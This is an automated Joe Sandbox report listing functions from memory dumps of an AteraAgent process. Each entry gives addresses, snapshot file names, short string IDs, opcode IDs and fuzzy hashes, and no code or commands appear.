                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: h\J8
                                                                                                                                                                                                                                          • API String ID: 0-2565130293
                                                                                                                                                                                                                                          • Opcode ID: 21614f637ebe6a724d124dc99efecdc849400d7b1f8c8685e6137ef063ffb1d1
                                                                                                                                                                                                                                          • Instruction ID: c92daf60def544d8d9efd1b26f2de2ad022e8b072d1f57168cdac4419b970f0d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 21614f637ebe6a724d124dc99efecdc849400d7b1f8c8685e6137ef063ffb1d1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B911A031D0C68A8BEB00DBA8C4556EDFBF5FF46340F0545B9E10AD7192DF2865498B81
                                                                                                                                                                                                                                          Function 00007FFAAB56B679 Relevance: .4, Instructions: 413COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 957a39395f4aa1cd1ef6d0ecd1eeb9a2d152ae389faf096c44cf582f8b00c8a0
                                                                                                                                                                                                                                          • Instruction ID: 8679930678ee07b6d28e1ef1300b7e0638316c698629232ceeeed5f8855db86b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 957a39395f4aa1cd1ef6d0ecd1eeb9a2d152ae389faf096c44cf582f8b00c8a0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3D1DA30508A8E8FEBA8DF28CC567E977D1FF55300F04826EE84EC7292CB7598458B81
                                                                                                                                                                                                                                          Function 00007FFAAB56673C Relevance: .4, Instructions: 361COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 49315c21d09cee9d451a6755aa82351097283985d03b4a8949052d52570acdb7
                                                                                                                                                                                                                                          • Instruction ID: 48d02c31d5583fb08bac85825c5b860a2ec1c7c5c79318a17cfc640829fefac8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49315c21d09cee9d451a6755aa82351097283985d03b4a8949052d52570acdb7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65C11B6180E68B8FE795DB7888656E57BE4EF56390F0C41FDC44ECB1E3E928984987C0
                                                                                                                                                                                                                                          Function 00007FFAAB56C536 Relevance: .3, Instructions: 332COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7ad8924cf64e961d4b146d623b6bec5450411b1a74e237a13c3b050ee129b95b
                                                                                                                                                                                                                                          • Instruction ID: b449bbc6d4d44b0bdbc51b20eefd7200a57ee5af138b8e30a6f30df5a054eaaf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ad8924cf64e961d4b146d623b6bec5450411b1a74e237a13c3b050ee129b95b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F1B1B570509A4E8FEB68DF28C8557E97BD1FF56350F04826EE84EC7292CB7498458BC2
                                                                                                                                                                                                                                          Function 00007FFAAB56946C Relevance: .2, Instructions: 195COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 659bc996e61daf1a0f74335d11c11ceb6107222398a3953929a97bc1521b719a
                                                                                                                                                                                                                                          • Instruction ID: 74940c8b1f2282deaa3e51adfdfe5b824e7e211c846a566f9cb80856dd9f620d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 659bc996e61daf1a0f74335d11c11ceb6107222398a3953929a97bc1521b719a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24517071908A0C8FDB68DB68D855BE9BBF1FB59310F0482AAD44DD3252DE34A985CF81
                                                                                                                                                                                                                                          Function 00007FFAAB6504E1 Relevance: .2, Instructions: 165COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1451671879.00007FFAAB650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB650000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab650000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 05f078e581f7a16cd8077fd95fea7680ca406e36925fccab9ecdb89b528abcf4
                                                                                                                                                                                                                                          • Instruction ID: 8e6ee6e8b63f7b74ec12901a063b82e53d301a91ee81180d443a8321a7b4b43e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05f078e581f7a16cd8077fd95fea7680ca406e36925fccab9ecdb89b528abcf4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B41166160DBC68FE792977C48565A47FE1EF6725031902FFC089C72B3E9189C4A8392
                                                                                                                                                                                                                                          Function 00007FFAAB5659E8 Relevance: .2, Instructions: 159COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 232d3242cd463e1ed456352f80f59bb1e5fddacb7b6811ff6fd79a4197cddad9
                                                                                                                                                                                                                                          • Instruction ID: f32ff0c8a72c95e0fc9615805c5fee9c48b42ffd564b5c9e7eeaaff5b080a641
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 232d3242cd463e1ed456352f80f59bb1e5fddacb7b6811ff6fd79a4197cddad9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0151293184E68F8FE7599B7488611A877E0EF47391F0801BAD04FC72B2EA1C544A87A1
                                                                                                                                                                                                                                          Function 00007FFAAB56E6D9 Relevance: .1, Instructions: 135COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 625cf72fcdeac9c23062f9ae90d01d1693c843b9e805509edb209bda9e37b055
                                                                                                                                                                                                                                          • Instruction ID: b8a251fefa9f6658ba98179ae21cfb2a472d7a11bd8cc38c8935f72fcf5ea254
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 625cf72fcdeac9c23062f9ae90d01d1693c843b9e805509edb209bda9e37b055
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A41F83090950ECFDB88EF58D4A0ABEB7B5FF5A300F144469E00EE7292DB75A845CB90
                                                                                                                                                                                                                                          Function 00007FFAAB567C51 Relevance: .1, Instructions: 103COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b50dc2c122e939885d70dd2c12fc3973b245ed7a378b83d563f47702e3bf2357
                                                                                                                                                                                                                                          • Instruction ID: 63e9480e939bf5d286a3a88933cc4e5359db621bd19325a9b2ddc5a974816c8b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b50dc2c122e939885d70dd2c12fc3973b245ed7a378b83d563f47702e3bf2357
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8631A770909A4D8FEB41DB68C8506F9BBF1EF5A350F0841B7D409DB292EB3C9946CB90
                                                                                                                                                                                                                                          Function 00007FFAAB564EFA Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6031e182ccf3b790012791f952a670db86c516e882ece44a926d4a880dd3bac1
                                                                                                                                                                                                                                          • Instruction ID: 2059c1cecd42820452282662aee24aeca989b29b37fbc67af3496bbcdc0196dd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6031e182ccf3b790012791f952a670db86c516e882ece44a926d4a880dd3bac1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17210672A0D79A4FD746EF68E8715E6BFA4FF46320B0801BBE14DC72A3D9245809C791
                                                                                                                                                                                                                                          Function 00007FFAAB567DC1 Relevance: .1, Instructions: 82COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 149114ca76da45211030a43c4282546a61d147c979e32b3082b971e334c52dbd
                                                                                                                                                                                                                                          • Instruction ID: d9509079953387a3cf5be329d229b93125c0c1a6479bc3f1e9ec4a8bf2d56a8f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 149114ca76da45211030a43c4282546a61d147c979e32b3082b971e334c52dbd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31214A70D19A5D8FEB84EBA8C895AEDBBF1FF59341F040476E408E7252DB38A8458B40
                                                                                                                                                                                                                                          Function 00007FFAAB56483D Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4bfeb33112cba50ee803593fd76f366cbdb733750c7a09935e4251064b4ecb9f
                                                                                                                                                                                                                                          • Instruction ID: dacf0c416c8198abb4ebbc5b5bc9e5eaa476b4285c5540bded1ae86afb739165
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bfeb33112cba50ee803593fd76f366cbdb733750c7a09935e4251064b4ecb9f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1011296290D6CA8BE750BF7CD8A01FDBB64EF46244F0845B2E04D860E3ED24984A86C1
                                                                                                                                                                                                                                          Function 00007FFAAB56D12B Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 0ddfe24f5fa84c56ad152e6ba81f435a59c279f7a7dbaf27dc93384fbbadea92
                                                                                                                                                                                                                                          • Instruction ID: 1bc43da7d3899149afec8728f883bfa1f9e3503125f2c95766e8b7efcabf430b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ddfe24f5fa84c56ad152e6ba81f435a59c279f7a7dbaf27dc93384fbbadea92
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B11E87190591DCFDF84EBA8D494AECBBF1FF59340F540066D00DE7261DB38A8418B50
                                                                                                                                                                                                                                          Function 00007FFAAB566E93 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1450994415.00007FFAAB560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB560000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffaab560000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4db7e997fc44cbe5bcde5953b4116c764836bf346ba6dd5c1a6b7f147ab74357
                                                                                                                                                                                                                                          • Instruction ID: 26f111f7503e881d680cc9f5484030234efa673cbe514e8b448ff00702b438b0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4db7e997fc44cbe5bcde5953b4116c764836bf346ba6dd5c1a6b7f147ab74357
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 85A00202EDB46F919445219DB9520D8F248CB861B1BC96572ED0D8415B988E19DA02C5

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 00007FFAAB580C58 Relevance: 13.4, Strings: 9, Instructions: 2154COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 0WO$0WO$/E$/E$/E$/E$/E$/E$/E
                                                                                                                                                                                                                                          • API String ID: 0-1916050242
                                                                                                                                                                                                                                          • Opcode ID: 48b0d0af58c1aaf5f36c179deff06a5af62e64a732f7dc29f9d732652fa24580
                                                                                                                                                                                                                                          • Instruction ID: c9a0f5e107ae4c6f5fed50d260a0649169cc4792b14099b6ca4fa0bf58286219
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 48b0d0af58c1aaf5f36c179deff06a5af62e64a732f7dc29f9d732652fa24580
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B035C70D0961A8FDBA9EF24C494BB9B7B5FF5A340F5040E9D00ED7292CA35AA85DF40
                                                                                                                                                                                                                                          Function 00007FFAAB5A6040 Relevance: 8.4, Strings: 6, Instructions: 906COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 6E$6E$6E$8hG$8hG$\
                                                                                                                                                                                                                                          • API String ID: 0-3534639814
                                                                                                                                                                                                                                          • Opcode ID: 5d2b1d8c9f1dc25ec03826d0bcb82711c1b01191d9f7ecab4e009daca890e8e1
                                                                                                                                                                                                                                          • Instruction ID: cd841152e3497cc4fbc6537dd5103bc7508b6cb97c0d3a4d72dd5ab0eb3e2b68
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5d2b1d8c9f1dc25ec03826d0bcb82711c1b01191d9f7ecab4e009daca890e8e1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A526870A1DB468FE768DB28849967577D5EF9A340F04807ED48FC32A3DD28B84A87C1
                                                                                                                                                                                                                                          Function 00007FFAAB58DE20 Relevance: 4.3, Strings: 3, Instructions: 542COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 6E$J9E$plO
                                                                                                                                                                                                                                          • API String ID: 0-3249010378
                                                                                                                                                                                                                                          • Opcode ID: fbf855037956f5d4fc3f546dccc3f339d7b8989ed6c37c9a65575c0b96739280
                                                                                                                                                                                                                                          • Instruction ID: 7912a0b40082a4f52ed51b57b83ddff560403e36fe0cf6a015c189950299cc7a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbf855037956f5d4fc3f546dccc3f339d7b8989ed6c37c9a65575c0b96739280
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4E15C71A1CA4A8FE759EB6C84555797BE1EF9A380F0041BEE04EC72E3DD24EC468781
                                                                                                                                                                                                                                          Function 00007FFAAB584C41 Relevance: 4.2, Strings: 3, Instructions: 401COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 0DO$0DO$`mO
                                                                                                                                                                                                                                          • API String ID: 0-799729319
                                                                                                                                                                                                                                          • Opcode ID: b0e8b75ec1212dcde85ccb4fd285f3b0855ce2c6701f173662280d6f46e695d2
                                                                                                                                                                                                                                          • Instruction ID: f4e6af4b2bc89fd994c6c4fc1fd2bdcfe16d11a238ea6a045e54eccf0211b480
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0e8b75ec1212dcde85ccb4fd285f3b0855ce2c6701f173662280d6f46e695d2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27D1C07190AA4E8FEB94DF68C4556BA77F1FF5A380F5040BAD00DD72A2CA385945DB80
                                                                                                                                                                                                                                          Function 00007FFAAB583466 Relevance: 4.1, Strings: 3, Instructions: 380COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (3N$XH$XH
                                                                                                                                                                                                                                          • API String ID: 0-10795795
                                                                                                                                                                                                                                          • Opcode ID: 40d9e947b68ea1d62eb79a9d45c42a1062c0904b8af4c936aa4dc25f35baa4cc
                                                                                                                                                                                                                                          • Instruction ID: 323e431f4e0f60dbd1688d2e3277e98edc2498fc58d2f4093bda3f0bfae9b686
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40d9e947b68ea1d62eb79a9d45c42a1062c0904b8af4c936aa4dc25f35baa4cc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6D1A3A1908A8D4FEB95EB78C8556AA7BF1FF66380F4100F6D40DCB2A3DE245D46CB10
                                                                                                                                                                                                                                          Function 00007FFAAB59B1E7 Relevance: 4.0, Strings: 3, Instructions: 295COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: _$b4E$p[G
                                                                                                                                                                                                                                          • API String ID: 0-2099924344
                                                                                                                                                                                                                                          • Opcode ID: 642e21937401524bb1a8b3a5fb53bcacaa7c248e4bef9c3156ec53a2d168cb8b
                                                                                                                                                                                                                                          • Instruction ID: 0aa1cbb1d0abad61f2312c737ea43669ff7c8b4a5b4c5e059bb501826c9b52da
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 642e21937401524bb1a8b3a5fb53bcacaa7c248e4bef9c3156ec53a2d168cb8b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36B14D70D0961ACFEB68DF58C855BACB7B5FF59340F0045A9D00EE7292DA366985CF80
                                                                                                                                                                                                                                          Function 00007FFAAB59B220 Relevance: 4.0, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: _$b4E$p[G
                                                                                                                                                                                                                                          • API String ID: 0-2099924344
                                                                                                                                                                                                                                          • Opcode ID: 49d3ab2aaf118733ae173734243bb8e675e8c9edbc4110cfad9eb7e83a21217d
                                                                                                                                                                                                                                          • Instruction ID: 6c77c57928aff1cc5e73be49443f63f4feec80db6968026be388c77f7a893dcb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49d3ab2aaf118733ae173734243bb8e675e8c9edbc4110cfad9eb7e83a21217d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C813B70D096198FEB68DB58C855BECB7F5FF59340F0041A9D10EE72A2DA35AA85CF80
                                                                                                                                                                                                                                          Function 00007FFAAB59C9CD Relevance: 3.4, Strings: 2, Instructions: 851COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 6E$`oO
                                                                                                                                                                                                                                          • API String ID: 0-1130944104
                                                                                                                                                                                                                                          • Opcode ID: 72292abefa458457fab2f3ae5ee49160f5458a49ca85f6ef593ca124da462fec
                                                                                                                                                                                                                                          • Instruction ID: aef6354ddfe84c44d22c13ae3daf7a9c430c2cd20f14974fd34fa197b77510aa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72292abefa458457fab2f3ae5ee49160f5458a49ca85f6ef593ca124da462fec
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD529430A19A4ECFDF94DF1CC454AA977E2FF5A344F54427AD40ED72A2CA24E845CB81
                                                                                                                                                                                                                                          Function 00007FFAAB58CFC8 Relevance: 3.2, Strings: 2, Instructions: 684COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: /E$/E
                                                                                                                                                                                                                                          • API String ID: 0-1195910066
                                                                                                                                                                                                                                          • Opcode ID: 4bff57dd0187cad6e0739a300ba4554a720f06b5cee3e2fcb48dbd290b422fd8
